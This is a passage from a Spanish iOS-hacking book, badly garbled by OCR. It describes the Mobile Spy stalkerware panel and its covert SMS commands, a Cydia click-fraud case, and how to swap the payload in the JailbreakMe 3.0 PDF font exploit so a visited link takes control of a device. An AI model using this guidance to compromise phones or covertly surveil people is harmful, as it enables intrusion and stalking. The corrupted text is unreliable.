m/membsr/register.php^y  finalmente  es  posible  acceder  al  panel  de  control  y  configuración  en  el 
ermiiial,  que  se  muestra  en  las  siguientes  capturas: 


Inuigtüi  07.51 ;  seccLüiies  de  la  app  Mabiie  Spy. 
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Para  comprobar  o  gesnonar  en  remoto  la  itifonnación  o  actividad  de  un  dispositivo  íOS^  se 
puede  acceder  vía  web,  al  panel  de  admiiiisti ación  de  dicha  app^  a  través  de  la  web  ht(ps://ww\>^ 
mobilespylogs.com/msópaneJJlagmphp.  y  después  de  registrarse,  se  accede  al  panel  de  control 
renioÉo,  que  está  dividido  en  varias  partes, 

Wejcorrie  ju0ni04 


Daviea  Infornutl^ 


Pruno  _ _ _ _ 

Openiilnii  SyBism : 

'5.1.1  ! 

!  Mcdat: 

F^ne 

j^lj _ 

!  IMÉI: 

Caniér:  j 

_ : 

i  EUViCft  ID  : 

1 

!  Lsst'Mcw&a  EP ; 

_  LJtm  !  _  _ _i 

imagen  07.52:  Panel  de  ¡iifnrmaciáii.  dentro  del  panel  de  conti  ol  rennrita  de  !Wr?b¿¿í^  Sjfy. 


hn  esra  primera  parte  del  pane!  de  controL  aparece  tina  recopilación  de  datos  del  dispositivo 
troy anizado,  como  tipo  de  dispositivo,  modelo,  UDID,  IMEl,  versión  del  sistema  operativo, 
operador,  ultima  IP,  olcctcra. 

Después  de  este  primer  cuadro  de  información,  aparecen  oíros  cuadros  que  recogen  todas  las 
acciones  que  se  pueden  realizar  o  monitorizar  del  dispositivo  infectado,  separados  en  dos  secciones, 
tal  y  como  se  muestra  en  la  siguiente  captura: 


Imagen  07.53:  Panel  web  de  coniroi  remoto  o  monitcri2ajclón  de  AíoMe  Spy. 
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En  dicho  panel,  se  encuentran  dos  secciones,  la  piinieia  es  la  parle  de  iogs^  llamada  Log  Vim^í^  y 
la  segunda  sección  User  Tools.  En  estas  seecicnes  se  pLieileTi  ver  numerosas  acciones  permitidas, 
para  inoiiitorizar  diferentes  servicios  utilizados  en  el  terminaL  aunque  cabe  decir,  que  no  todos 
estos  servicios  fiincionan  en  iOS^  ya  que  algunos  son  específicos  de  Blackheny  o  Androide  aunque 
aparecen  en  este  panel  ya  que  el  panel  de  control  es  general  para  todos  Los  sistemas  operativos 
móviles. 

Por  otra  parte  se  tiene  el  último  cuadro  de  opciones,  llamado  User  TíjoIs^  en  el  que  se  pueden 
realizar  tareas  relacionadas  con  el  propio  troyaiio  Mabile  Spy  y  la  cuenta  con  la  qne  se  ha  registrado 
el  dispositivo,  ya  sea  cambiar  la  contraseña,  desins talar  Mobile  Spy  en  remoto,  obtener  soporte,  o 
deslugucarsc,  y  con  respecto  a  los  logs,  se  pueden  hacer  búsquedas,  bonar,  o  ver  el  resumen  de  todtis 
¡ogs. 

Además  se  pueden  enviar  comandos  SMS  al  dispositivo,  lo  cual  es  bastante  interesante,  ya  que  a 
través  de  estos  eomandos  SMS,  se  pueden  realizar  multitud  de  acciones  de  control  sobre  el  terminal 
infectado. 

A  continuación,  se  muestra  una  captura  de  varios  ejemplos  de  comandos  SMS: 

IPhon»  SMS  Commandft: 

*tZ345  lock  -  Rematsly  Jock  thft  ptione  lo  restrícfl  üsage. 

*1 SS45  unlc^k  -  Remoleiy  untek  tho  phcpoe  to  aJiow  usage. 

*12346  gps  Retrt&ve  Ihe  cgrrerl  GPS  positlon  of  Ine  monilored  phofie.  The  phone  you  seod 
tte  oommand  from  wü  Peceivo  an  SMS  me^sage  contaH-TÍng  this  positiDn  and  a  link  to  ÍT  on  a 
map. 

*12345  srmirdo  -  Reíneve  Ihe  current  rnformBlíon  on  the  SIM  card  currently  in  Ehe  device.  The 
phone  yfxj  send  the  oommand  from  wili  recojve  an  SMS  messege  coiiAatníng  inífematiorÉ. 

*12345  wtpe  -  Remotety  deiete  the  recent  cal]  hi^ory,  SMS  hístory,  URL  Nstory,  stored  contacís» 
and  photos  on  the  monitoned  deviee. 

When  aending  an  SMS  command,  only  indiids  fhe  command  oode  itsetf  (no  othof  ink>  in  Ehe 
m^essage),  The  mpnilarad  ptione  wÜI  nol  receive  an  incomíng  message  alerí  as  rf  a  normal  SMS 

message  doas. _ 

Imagen  07.54:  Coíriauitioií  SMS  de  Atí/hih^  Spv  para  iOS. 


Otra  cosa  a  tener  en  cuenta,  es  la  qne  la  funcionalidad  del  troyano,  dependerá  de  la  versión  utilizada, 
ya  que  existe  una  versión  trial,  y  evidentemente,  para  tener  la  fuTicionalídad  total,  habrá  que  tener 
una  versión  de  pago.  Además  para  algunos  servicios  como  el  envío  de  comandos  SMS,  hace  falta 
un  complemento  llamado Control  Fanei^  que  permite  además  el  envío  de  los  ¡ogs  por  correo. 
Para  activar  este  servicio,  hay  que  situarse  eo  la  última  pestaña  de  la  app^  y  se  podrá  configurar 
tfecuencia,  y  contenidos  de  ¡ugs  enviados  a  la  cuenta  deseada,  tal  y  como  se  aprecia  en  la  siguiente 
captura: 
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CsM  Hístory 


Text  Messages 


Itnagsn  07.55:  Activaníio  LÍVE  Coníwi  Pokc!. 


Logo  to  Sond 


A  continiiñción  sa  mnestra  una  captura,  en  la  que  aparecen  las  ventajas  del  servicio  LIVE  Control 
Pane!,  y  su  precio: 


*  Stic  tf>e  Phofíe's  Scneeff^  LIVE  (n  Yülh'  Sttowser* 
t  tííÉ  cument  GPS  Locafion  LIVE  on  a  ^^lap 

t  PñT'omn  Insten-  Su  rvdfianca  and  Reoovery  CofTVjnanda 

*  Enabtó  ^tomaüc  Email  Log  Deftveiy  for  Norma!  Logs 
►  insta  ntly  Send  Contaets  and  Calí  Logs  vía  Emíil 

*  Inatently  Sentí  SMB  Loga  vía  Ernatt  l^very 

*  InMate  a  Ngrnial  Cali  on  Uiy  Davíce  tor  Recoverv 

*  Sentí  a  htoimai  SMS  on  the  Oe^nioe  ÍCf  Recmrearv 

*  Loch  or  Uníock  líie  Ptione  Fram  Bfrfng  Lsed 

*  Tüm  a  Slren  Aferm  Qn  or  EHt  fbr  Recovery 


Pu  reliase  Now  S  39,97  Par  Year 


Imagen  07,5Ei:  Fiincioríalitkdes  y  precio  á^LlVE  ConíJ-ot  Pami^ 


FlcxiSpy  y  Oxiden  Forensíc 

R1  numen)  de  Lroyaiios  creados  paia  instalar  en  dispositivos  que  dispongan  de  terminales  con 
Jailbreak  es  considerable.  FíexiSpy  es  otro  de  los  tróvanos  que  ofrece  múltiples  fLincionalidadss, 
que  con  mayor  o  menor  aproximación  son  las  mismas  que  se  han  mencionado  en  los  casos  anteriores 
expuestos. 
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Sin  cmbariií),  no  solo  hay  hcTramícnliis  para  troyanizar  sislcmas^  y  aplicaciones  de  forense  profesional 
como  Oxygen  Foremic  tienen  módulos  especiales  para  detectar  este  tipo  de  software  malicioso 
instalado  eu  eí  teniiinal. 


Imagen  07.57:  Oxiden  Faremic  detecta  sp^/Hú}^  y  fjKjiware  en  los  terminales  íPhone. 


Malware  a  través  de  Cydía:  Un  casi)  de  Click  Fratid  —  ^ 

AI  igual  que  en  el  caso  de  JmtaStock^  donde  Choflie  MiUer  demostraba  cómo  era  posible  hacer  un 
maimií^  y  distribuirlo  por  la  App  Sloiv.  este  caso  de  Ciick  Fraud  descubierto  por  un  investigador 
español,  demuestra  que  también  se  puede  crear  una  aplicación  dropper  en  Cydia  que  consiga  engañar 
a  usuarios  para  troyanizar  sus  sistemas. 

El  caso  de  Eagie^  que  así  se  apoda  el  protagonista  de  esta  historia,  es  que  se  dio  cuenta  de  que  su 
tarifa  de  datos  se  estaba  consumiendo  de  manera  alarmante »  por  el  típico  mensaje  del  operador, 
algo  que  pudo  contrastar  por  sí  mismo  con  la  herramienta  Díjrnf  Monitor,  tal  y  como  se  aprecia  en  la 
siguiente  captura; 


164 


Hackiiig  de  dispositivos  ¡OS:  iPhone.  &  jPad 


Imagen  07.58:  Cónsiamo  de  Tráfíeo  con  Da/ía  Mojtiíor. 


Para  descubrir  la  aplicadnn  cauísante  de  este  alarman  Le  consumo  hizo  pasar  el  tráfico  por  un  cquifMi 
por  i^Vireshark,  usando  de  un  ataque  man  in  thc  middie  con  Eftercap  entre  su  terminal  iPhone  y  el 
louter  Wi-Fi  de  casa,  para  descubiir  que  se  realizaban  iiiuclias  peticiones  a  sitios  web  extraños- 


[iiiagen  07.59:  Sitios  web  visitados  automática  me  lite. 
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Tras  analizar  en  detalle  una  de  las  VKLs,  descubrió  que  una  de  ellas  llevaba  en  un  parámetro  GET 
el  nombre  de  un  usuario:  Nobitazzz^  creador  de  9  aplieaeiones  en  entre  otras,  iOS  6  Fhoios 

Memi,  que  es  fa  que  había  descargado  el  usuario  que  sufrió  e!  protagonista  de  esta  historia. 


Iimagen  07.60:  URL  con  rcíbrcncia  a[  usuario  Núhitazzz. 


Este  LJSLEario  Nobítazzz  estaba  haciendo  peticiones  a  anuncios  p  iib  licitan  os  realizando  un  CiickFmud 
3  las  compañías  de  publicidad,  en  las  que  se  podía  consultar  el  dinero  ganado  hasta  el  momento  por 
este  usuario  en  una  de  ellas.  Cuesta  imaginar  lo  que  llevaría  en  total  ganado  en  todas  ellas,  motivo 
por  el  cual  el  mundo  del  fraude  onlliie  es  tan  rcntahic. 
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Íiuíigea  07.61 :  Dinero  ganado  por  Nobhazzz  cit  una  de  fas  UÉlLs. 


A  día  de  hoy,  Smmk^  creador  de  Cydia^  está  avisado  y  ha  tomado  medidas  contra  este  usuario  que 
ha  prometido  no  realizar  dicha  acción  más,  pero  la  situación  deja  de  manifiesío  la  necesidad  de 
confiar  en  las  medidas  de  seguridad  que  las  tiendas  de  aplicaciones  toman  sobre  las  aplicaciones 
que  ofrecen. 


Conclusión 

Al  final,  ya  sea  mediante  una  app  a  través  de  la  App  Store  c\ivt  salte  los  controles  y  contenga  fiinciones 
dormidas,  a  través  de  la  realización  de  un  ataque  basado  en  un  provísionmg  profile  a  un  temiinal 
sin  Jailhmak,  mediante  la  realización  de  un  JaÜbreak  o  haciendo  uso  de  Cydia  y  terminales  que 
ya  tengan  Jallbreak^  es  posible  encontrar  formas  de  iiiEroducír  un  soflv^^are  malicioso  que  controle 
remotamente  un  terminal  iPhone  o  iPad. 
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Capítulo  VIII 
JailOwnMe 


1.  Introducción 

El  ñiRtema  operativo  ¡OS  de  Apple  es.  probablemente,  uno  de  los  más  seguros  debido  a  la  gran 
cantidad  de  controles  de  seguridad  que  se  ineorponm  por  defecto  y  que  además  no  pueden  ser 
desactivados  por  el  usuario.  Sin  embargo,  el  número  de  bugE  que  se  descubren  día  a  dia  en  iOS  es 
muy  alto,  y  basta  con  echar  un  ojo  a  las  estadísticas  para  darse  cuenta  de  que  podrían  desarrollarse 
muchos  expJoUs  con  ellos,  con  la  paciencia  y  los  conocimientos  adecuados. 


Imagen  08,0  U  Estadísticas  de  bug^  en  ¡OS  rccügidan  un  expedienies  CVE. 


La  mayoría  de  dichos  bitgs  no  son  públicos^  quizá  debido  a  la  gran  cantidad  de  dinero  que  se  está 
pagando  por  elfos  y  a  la  complejidad  de  desarrollarlos,  que  según  k  revista  Forbes  es  de  los  más 
caros. 

Por  desgr^ciíL  la  seguridad  frecuentemente  es  inversamente  proporcional  a  la  usabilidad,  con  lo 
que  paralelamente  a  la  aparición  de  íOS  ha  surgido  la  eomunitkd  de  Jaiibreakers,  que  desarrollan 
modificaciones  sobre  el  sistema  operativo  original  que  les  permita  ejecutar  softw^are  no  fimadí}  por 
Apple  o  poder  acceder  de  lorma  completa  a  los  directorios  del  dispositivo. 

bn  un  íOS\  todo  el  software  se  encuentra  firmado  por  Apple,  desde  IsíBoutRom  hasta  el  propio 
del  sistema  operativo,  y  por  supuesto  las  ^licaciones.  Como  consecuencia,  no  se  puede  mí>diñcar 
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c1  kernd  de  ninguna  manera,  ya  que  la  firma  sería  errónea  y  csLc  nunca  sería  ejecutado.  Para  ello,  la 
comunidad  ákzJaílhrEah^rs  se  ha  lanzado  a  la  búsqueda  de  winerabilidades  que  les  permiUm  obtener 
el  control  suficiente  como  para  modificar  el  proceso  de  arranque  (Itamado  Secitre  Bóot  Chain  por 
Appít)  y  poder  ejecutar  un  heme  i  modificado  o  cualquier  otra  cosa. 

Para  vj\ pfiníEstEr,  el  “cualquier  otra  cosa’’  que  se  pude  realizar  con  un  exploii  que  es  utilizado  en  las 
henamientas  Jailbreak  es  k>  más  inicrcsaiite,  ya  que  se  pueden  usar  las  mismas  vulnerabilidades 
utilizadas  paia  hacer  Jaiíbf'eaC  comprometer  un  dispositivo  y  obtener  acceso  a  su 

itiformaciÓTi.  Si  estos  son  remotos,  como  los  que  se  usaron  ^nJailbrEak  2.0  y  Jíúlhi^eukMe  3.0  mejor 
que  mejor  De  esio  trata  este  capí  Luí  o,  de  cómo  se  puede  sacar  provecho  de  un  exphit  uti  [izado  en 
JailbreakMe  para  adaptarlo  a  nuestras  necesidades. 


2.  JailbreakMe  3.0 

CamEx  es.  sin  duda,  uno  de  los  hackers  de  iOS  más  contTcidos  de  la  set-ne.  De  sus  manos  han  salido 
diversos  métodos  que  ha  ido  publicando  en  su  web  hUp://\\^^\nvdúHbréi¿2kME.c(}m/.  £1  más  reciente 
de  ellos,  llamado  JaiíbreakMe  3.0,  sni^ió  tras  la  aparición  de!  iPad2,  momento  en  el  cual  no  existía 
ninguna  manera  de  hacer  a  estos  dispositivt^s,  ya  que  el  ejcploU  Umeralri  {descubierto  por 

Geúhof,  otro  de  los  grandes  de  la  seme),  que  era  el  utilizado  hasta  este  nií^mcnto,  aprovecíiaba  una 
vulnerabilidad  en  la  BootRcm.,  y  esta  bahía  sido  actualizada  en  los  nuevos  dispositivos.  Este  nuevo 
método,  además,  funcionaba  en  la  versión  4.3..X  (hasta  la  4.3.3),  en  la  gKVd  Apple  había  incrementado 
la  seguridad  dcl  dispuailivo  añadiendo  nuevas  medidas  de  seguridad  como  Address  Space  Layoiít 
Randomízaiiún  (ASLR);  A  peinar  de  eso,  Camex  consiguió  encontrar  nna  vulnerabilidad  con  la  que 
era  posible  hacer  Jmibreak  de  los  dispositivos  con  tan  st>lo  vísiiai  su  web  y  pulsar  en  un  botón,  algo 
que  fasemó  a  Lodos  los  usuarios  de  IOS. 


Icriiigen  ÜS  .02 :  Jad^fr-ikM^  0  er^  Cvdia. 
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Como  suele  ociirrii,  hay  avances  que  fascinan  a  unos  y  asustan  a  otros.  Era  evidente  que  si  Cbwexera 
capa/  ílc  hacer  Jmíbreak  de  los  dispositivos  con  mn  solo  visitar  una  web  era  porque  el  MohihSafari 
o  alguno  de  sos  complementos  tenía  alguna  vulnerabilidad  que  el  uLili/aha  para  ejecutar  código  y,  a 
paitir  de  ahí,  realizar  ^IJaílbrEak.  Sabiendo  esto. ..  ¿qué  impediría  a  un  atacante  utilizar  esta  iiiisnia 
vulncrahiliíkd  para  tomar  el  control  de  los  dispositivos? 

En  un  principio,  ci  desconocimiento  de  la  vulnerabilidad  era  lo  uiiict}  que  impodía  su  uso  para 
otros  propósitos,  ya  que  los  de Lábiles  sobre  esta  no  serían  publicados  hasta  tiempo  después.  Más 
larde,  Comex  publicaría  incluso  qué  código  ñiente  empleaba  para  explotar  la  vulnerabilidad  en  su 
repositono  á^g¡thub\  hUpsd/gUhub  com/Cümex/:^^^^^^ 

En  cualquier  caso,  investigar  una  vidiicrabilidad  a  partir  de  on  exploit  0-day  no  documentado  es 
una  tarea  muy  habitual  en  los  equipos  de  seguridad  de  las  principales  eiupiesas  de  desarrollo  de 
softwam  y  sistemas.  Como  es  bien  sabido,  gran  paite  de  los  parches  de  seguridad  que  publican  ios 
fabricantes  de  sistemas  operaLivos  son  obtenidos  tras  liaber  sido  explotados  por  algún  atacante  o 
mediante  un  exploit  0-day.  I  ras  realizar  la  ingeniería  inversa  de  estos  i:xploíts^  se  descubre 
la  vulnerabilidad  que  propició  la  explotación,  y  a  paitii  de  esta  información  estudian  la  mejor  manera 
de  corregirlo  y  se  desarrolla  el  parche. 


3.  Obteniendo  el  exploit 


Como  ya  se  ha  iiiencionadi},  cu  ur  principio  el  código  ñienie  del  exploit  utilizado  por  Comex  no  fue 
publicadla  pero  eso  no  quiere  decir  que  no  se  pudiera  averiguar  en  que  consistía.  Visitando  la  web 
http://\\>\^^x\Jailhreükh4e.coml  desde  un  equipo  de  usuario,  se  recibía  un  mensaje  que  decía  '^Come 
baak  on  your  íPhone,  IPad  or  iPod  Toiich  to  me  JaiIbreakMe"\  Era  evidente  que  la  aplicación 
web  real  i /a  un  reconocimiento  del  dispositivo  que  la  visitaba  utilizando  el  que  en  el 

caso  de  ios  sistemas  ¡OS  es  extieinadamenle  represcnLaiivo,  ya  que  contiene  la  versión  exacta  del 
sistema  operativo.  Esta  información,  al  igual  que  hacen  los  exploit- kits,  era  utilizada  para  redirigir  ai 
disposidvo  c!  exploit  adecuado  para  su  vei-sión,  y  de  esta  manera  realizar  el  Jailbreak. 

Por  siierte  para  los  usuarios  (y  para  los  atacantes),  el  User-Agmt  puede  ser  fácilmente  falseado 
utilizando  uu  proxy  iritermedio  otmo  Burp  o  ZAP,-  o  incluso  utilizando  alguna  extensión  para  el 
Davegador  que  permita  cambiarlo. 
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Al  visitar  ía  página  empleando  el  User-Ágent  adecuado,  esta  iiiueslra  un  boton  q[Uü,  al  ser  pulsada, 
redirige  al  navegador  a  un  fichero  PDF  especmlmenlc  construido  para  la  versión  de  ¡OS  cuyo  User- 
Agern  se  esté  usurpando.  Ninguna  acción  posterior  es  realizada,  por  lo  que  este  PDF  debía  contener 
la  explotación  de  la  vulnerabilidad. 

Un  listado  completo  de  los  PDFs  disponibles  puede  éíteontrarse  en  la  l  JRT.  http://wM,^Jaiibi’eakMe, 
com/$q§ron/J 

Los  PDFs,  al  intentar  visualizarlas  mediante  cualquier  visor,  contenían  una  única  letra  (@). 
Posteriorinente  se  sabría  que  la  vulnerabilidad  se  encuentra  en  el  procesado  dcl  formato  de  la  fuente, 
por  lo  que  visualizar  uim  letra  que  emplee  la  fuente  maliciosa  era  más  que  suficiente  para  explotar 
la  vulnerabilidad.  Fn  otras  situaciones,  un  atacante  podría  haber  embebido  esta  fuente  en  cualquier 
letra  de  un  documento  legítimo  con  el  fin  de  que  el  usuario  no  se  percatara  del  engaño.  Este  PDF, 
además,  podría  ser  enviado  por  diferentes  medios  {enlaces,  comeo,  etc)  e  ir  comprometiendo  ñ 
diferentes  dispositivos. 


Imagen  OS. 04:  El  documento  PDF  con  solo  una  arruba. 


Una  vez  obtenido  el  exploit  el  análisis  del  mi sm a  consistió  en  el  análisis  de  un  PDF,  como  si  de  un 
análisis  de  lualware  se  tratara. 


4.  Análisis  del  exploit 


En  muchaíí  ocasiones  no  es  estrictamente  necesario  entender  e!  fimeionamiento  de  un  f^xpioii  para 
poder  alterar  su  payload  y  conseguir  que  realice  las  acciones  que  se  deseen,  pero  ello  siempre 
contribuye  a  auiTicTilar  el  ctm acimiento,  así  que  es  un  ejercicio  muy  recomendable. 

En  este  caso,  el  JaUbreakMe  3,0  explota  dos  vulnerabilidades  diferentes  de  forma  consecutiva.  T.a 
primera  de  ellas  ñie  etiquetada  con  el  identiíicador  C\fE-201 1-0226  y  consistía  en  un  error  en  la 
comprobación  de  un  enten»  dentro  de  la  función  caiíoThersubr  de  Truenpe,  lo  cual  permitía  cambial 
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cí  puntero  de  pila  {stack pointer)  a  cualquier  dirección  arbitraria,  lista  dirección  “arbitraria’'  cenLcnía 
un  exploit^  codificado  coiop  le  lamente  en  JÍ.OP  {Return-Oriented  Programmíng)  que  explotaba  una 
segunda  \ailnerabilidad. 


Ovferflífcwed  Stadk  Uhe 


lio  agen  Análisis  del  L\íphii. 


La  segunda  ^ailnerabiiidad  exploLada,  etiquetada  como  CVE-201 1-0227,  comsisLía  en  im  error  en  la 
conversión  de  tipos  en  IO^^tobUeFrameB^ffér  que  permitia  la  ejecución  de  código  no  firmado  en  el 
dispositivo.  Conseguir  explotar  este  tipo  de  vulnerabilidades  es  muy  iraportaníe  en  la  explotación 
de  sistemas  iOS^  ya  que  en  caso  contrario  es  necesario  codificar  todos  los  shellcodes  completamente 
ee  ROP,  lo  cual  puedo  llegar  a  ser  extremadamente  complejo.  A  partir  de  Ja  expiotacióii  de  esta 
vulncrabiliílad,  el  exploit  ejecuta  un  shdlcoth  “Lradicionar^  {no-ROP)  que  realiza  uu  paroheo  del 
iernel  en  memoria  que  le  pemiilirá  ejecutar  código  sin  firmar  Ofia  de  las  modíncacTones  importantes 
que  realiza  el  exploit  st>bre  el  kernel  es  crear  un  niaiiejadí.>r  para  h  syscaü  0,  de  tal  modo  que 
.^cualquier  aplieación  que  realice  esta  llariiada  escala  automáticamente  a  privilegios  de  rooL 


CMí 

CVE-20 11-0226 

CVE-2  011  0227 

Producto 

lireeXype  <  2.4.6 

iOS 

iOS  afectado 

iOS  <  4.2.9 
fí9i’<  4.3.4 

íOS<  4.2.9 
iOS<  4.3.4 

Vulnerabilidad 

Comprobación  de  entero 
errónea. 

Conversión  de  tipos  errónea. 

Impacto 

Ejecución  de  Código 

Ejecución  de  aplicaciones  no 
firmadas. 

Tñbb  ÜS.Ol:  Tviblix  dií  veniiunt'ü  afectadas 
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Una  vez  hechas  estas  modíñcac iones,  descomprime  el  contenido  de  una  aplicación  de  iOS  que 
se  encuentra  dentrí>  dei  propio  PDF,  guarda  sn  conrenido  en  /mip/hcutus,  y  ejecuta  este,  que  es 
realmente  el  que  realiza  todo  el  proceso  áeJaUbreak,  bajándose  difereiiics  fichcrcís  del  la  web  http:// 
wwwJa  i  i bfeakAie.com  que  realizarán  las  modificaciones  permanentes  del  kefueL  la  reorganización 
de  ñcíieros  y  permisos  en  el  sistema  de  ficheros,  y  la  instalación  de  Cydia,  entre  otras  acciones. 

Un  análisis  muy  completo  y  detallado  fue  realizado  por  d  equipo  de  Sog^íi  ESEC  Lab,  el  cual  se 
recomienda  para  ampliai’  información  a  este  respecto:  http://€SP.c-íab  sogetLcúm/posí/AnaIysís-qf- 
íhe-JaiibreíikMe-vS-font-exphií. 


5.  Se  busca  payload 

En  realidad,  tal  y  como  se  comentaba  anteriormente,  muchas  veces  es  posible  localizar  el  payload 
del  expiolt  sin  necesidad  de  comprender  todos  y  cada  uno  de  los  pasos  que  este  sigue.  En  este  caso, 
resultaba  sencillo  localizar  el  cuerpo  del  binario  !o€Uius\  y  por  lo  tanto  cambiarlo  por  otro  diferente 
que  ejecute  las  acciones  que  se  deseen. 

Sí  se  edita  el  documento  PDF  que  se  ha  obtenido  (con  vi,  por  ejemplo),  se  verán  los  diferentes 
síreams  y  objetos  de  los  que  está  compuesto.  De  entre  todos,  uno  de  ellos  cim tiene  visiblemente 
mucha  más  información  del  resto,  aunque  es  la  es  ilegible  puesto  que  se  encuentra  comprimida. 
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Imagen  US. 06:  E[pm¡¡oad  áQ\  expíúit. 

Al  descomprimir  este  stream  se  aprecia  que  se  trata  de  ua  PFE  {PostScript  Type  !)  que  contiene  la 
descripción  de  la  fuente  mallbrmada  y,  presumiblemente,  el  contenido  del  binario  que  es  ejecutado 
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por  el  exploií.  Además,  Comex  ha  dejado  una  sci presita  llamada  TerminaíFim.  El  TermlnctíFim  es 
simplemctilo  una  sucesión  de  caraciLTcs  que,  al  menos  en  un  Mac  OS hace  que  el  Lermina]  donde 
se  lanzan  empiece  a  minimizarse  y  maximizarse  durante  im  largo  raro.  No  tiene  ninguna  relevancia 
ni  utilidad  para  la  explotación,  pero  es  bastante  molesto  en  caso  de  qtie  se  lia^a  un  caí  de  este 
eontenido. 


/BlcndDeslgriPü^illwib-  [[íí  tOJ  üüí 
/BtíiiidLíi'íiarMap  CM  [C]  deT 
/Bl€rtdrt>cisTytJeE  [/A  def 
/Te-ríanaLmr 

G;t[5t[¿t[5t[¿t[Sl[ít[5LLiít[5;tL¿:tt5L[Zt[5tr;ít[5i[:^t[5t[j!tLíi-Liítr5t[¿L[5í:Lií^L 

5t  c¿  t[a  t£¿t [5t[¿ti5 1 [Zi [51 "2  L[5  LC2i [5t[2t[5 1  D£  t  [5  tr2L[5  tOí  l [5L[2l [5  tLZt [5L[¿ 
t[3L[2l[SL[¿lL[SL£¿t  [lTíL[¿t[S  t.  [¿t.  [!7Í.[^t[5L£¿L 

[:íÍt[5lí;2t.[5t[;2l[5í[2l[5LC2L[5L[£t[5i[2t[5l'2H;5Li;íL[5t[2t|íi[2t"5L[¿L[5tC£t[ 
5 1  [¿  t  [5tC¿t  [5t  [¿t[5t  E2t  [5t  :2t  [5t  i:¿‘ [5t[2t  [5t  [2t  Gt  [2t[5-tC¿t  [5t  [2 1  [StllZt  [5tC£ 
t[5t  [Zt  [5t  [ZtíStrZx  [5t  [2t  [5t  lít  [5t  :Zt  [St  C2x  [St  [2t  E5t  Rt  [St  [2t  [5^[2t  [5t  C2t  C5t 
Rtr5tRtr5tr2tr5t[2tC5t|:ZT[5t[Zt[5t[2tr5t"2tf5tRt[:st[2ti:ítRt:5t[2t[5t[2t[ 
St[2t[5tCZt[5tC2t[StE2:t[5t:2t[5t|:2i[5tr2t[5t[2t[>t[£t[5t[2tr5t[2tt5t  def 
/Triv-ptfi 

Aerrv  -1  def 

Aübrs  11  íirrqy 

¿up  >c  vn - 

M-ttiiÓ/Vd  baísUHSf ; t^A4^ÍÍqu  (i  í"Íá  ■/ F  riori  f  ^4  ftT f il^fío- 

[sY '  r  -i  RhiSAlá  '&Z2¿a^}2^^ü6lC6íW2tY> 

H5¿CÍj3d‘<t_Sl>íí„'5áíl 

súK.GCCq"«¿^jtNplTcE<^Áe&.MxX^>éí!^  ^<VtÁtK^süz-n 

ta‘Wti^H3lp3úi0.*V  U»ü  á.á-ldií^eN(F:>^liélíjÚpí\k<Éj“;E^;óíí#ZÁ@e!é:pife 
SA*L|É  zCÜá'í34vÜl]lC"q^^-F>,U  r.#'nd*5*r\aG-^ÁÜí3&í±d~WJ‘*''üfflCoí t 

W6[¡fe"ac-lí>y#c  *  AU V!  >^0 .  aiKEI  "ÓiM 

4iiá A?  '0*  ’  OÍA  |I-^  Tí)¿r/  f:Vin)*íní^  _ia*BP^eXTT  I 

Lmagen  OS .07:  El  i?qy/oWdeSv<>íiiprimido» 


Además  de  esta  broma  de  Comex ^  es  posible  eTiconlriir  otro  objeto  {diip  0  12524)^  también 
comprimido,  del  que  se  puede  apreciar  que  también  tiene  im  tamaño  considerable.  Si  se  descomprime 
se  obseiTará  que  se  trata  de  un  binario  Mach-0  para  procesador  que  es  exactamente  el  tipo 
de  binarioLS  que  ejeeuLa  un  iOS. 


i  "'Or  Inisidrr.bln 
jji^¡L[r,üiiri  Mdi.íi-O  eru;i.uli4jlK 

%  - 

1  -1  Incide, bin 

T7J7 


1  ?_&T  u  b  Jie  l  F>e  r_TtXT?fl^  ?  7_í.st  r  li  iy_Tí  ÍCT  ?  3  ? 

?f _syr.b  B  Is  t  ubi_Tm^  T  ?  ?_D  0(3  'js  e  ¥_s  viTOo  l_p  AT^Sfl  e_ 

p  roe  rsTi^va  r  i_D  ATl^fil_£  vr*  o  ■._pt  r_D  ATAA4 1? úa  t  a_D  ATAPA? :  PI_c  f  st  rina_PATAig  |  _ bs  a  JAJA  B LI 

NKFrrT?  p?“ÍB|lí 

PM?<.? 


/US r/l  1  b/(^  1  rk? \ i 

B  /  U5  r/tib  /  UB  E .  I  -  a  y  I  Ib 

\:&?>'5V!itPii/1.1brn 

ry /r  iTjf icvaio  rK  ü/í  o  ref’ o  Lifi  d  a  1 10  n  *  rí  Dcfe  □  rtt/ c  D  re  Mili  d  a  ti  o  n 
?y  S>  '■.tPiB/L  I  b  ra  '■//PrsTKh'n  rkz  f  CfW  h  t  yo  rk ,  f  r  anewi  rk  /  CfTJ  fi  tun  rk 

\  i  i ,  /LiysTiefl/Libt^nvf  ra^'orkf/  hMjniiaTiDn.  rra 


m^T  rft/FnunbTT  i  nn 


+?/  US  VI T 13/ 1 1  h9cc_s.  1 ,  dylib 

4^/Ljrvr/Íib/lihsystFfi,B.rifliln  lpUTmT\nrnWT'*%rnri7^rn 


Imagtíii  08.0S:  El  en  cifrro. 
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Al  analizar  lo  que  hace  este  binario  se  observa  que  se  trata  del  binario  hcuws  ya  mencionaxlo 
anteriormente,  ya  que  realiza  una  sene  de  conexiones  a  la  web  de  JüiIbn^akMt'  rd.tí  y  se  descaiga 
los  ficheros  mencionados  anlerioriiiente. 

Sin  embargo,  ios pí^fjiesters  no  quieren  rcalizai’  un  Jcuibreak  pemianente  del  dispositivo  ni  instalar 
Cydlü,  sino  que  simplemente  pretenden  tomar  el  control  dcl  dispositivo.  Según  se  lia  comentado 
anteriormente,  el  expÍo¿£  cjeculaid  este  ñcliero  una  vez  parclieado  el  ksr?7^!  adceuadaincütc  para 
ejecutar  aplicaciones  sin  firmar,  desactivada  la  sandbox  y  el  resto  de  medidas  de  seguridad,  por  lo 
que  es  el  momento  idóneo  para  ejecutar  ed payíoad en  lugar  del  uiigínaL 

?(n  lo  tan  Lo,  si  se  es  capaz  de  analizai'  y  encontrar  este  binario,  sol[>  hay  que  cambiarlo  por  uno  de 
elección  propia  para  obtener  el  control  del  dispositivo  con  tan  solo  conseguir  que  visiten  un  enlace 
controlado  por  el  atacante,  Pero. ..  ¿Qué  se  desesa  que  ejecute? 


6,  Payloads  para  iOS 

Lamentablemente  no  es  sencillo  ^nconír ar  shells  inversas  ni  otro  tipo  de pfndocids  similares  para  iOS, 
ya  que  sus  protecciones  obligan  a  que  cualquier  pai^load  lenga  que  ser  ímplementado  cu  fii!!-ROd\ 
con  lo  que  no  se  ha  desarrollado  una  gran  variedad  de  payloads  como  sucede  con  (jtnrs  sis  Lernas 
como  ILfíJCÍbtvy  o  UNIX.  Por  suene,  gracias  al  segundo  explait  utilizado  por  Com&x,  es  posible 
